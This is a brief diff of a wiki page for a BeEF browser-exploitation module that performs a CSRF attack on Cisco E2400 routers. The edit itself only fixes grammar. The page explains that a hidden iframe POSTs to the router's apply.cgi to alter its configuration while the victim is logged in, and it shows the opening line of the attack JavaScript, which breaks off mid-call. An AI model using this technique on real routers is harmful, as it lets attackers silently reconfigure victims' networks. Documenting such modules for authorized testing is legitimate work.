partrickJhonson/beef/Module:-Cisco-E2400-CSRF.md

 ## Internal Working

 Uses an invisible iframe with a POST request to change router configurations.
-The victim has to be logged into the router for action to succeed.
+The victim has to be logged into the router for the action to succeed.

 ```js
 var cisco_e2400_iframe1_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "apply.cgi", "POST", "application/x-www-form-urlencoded",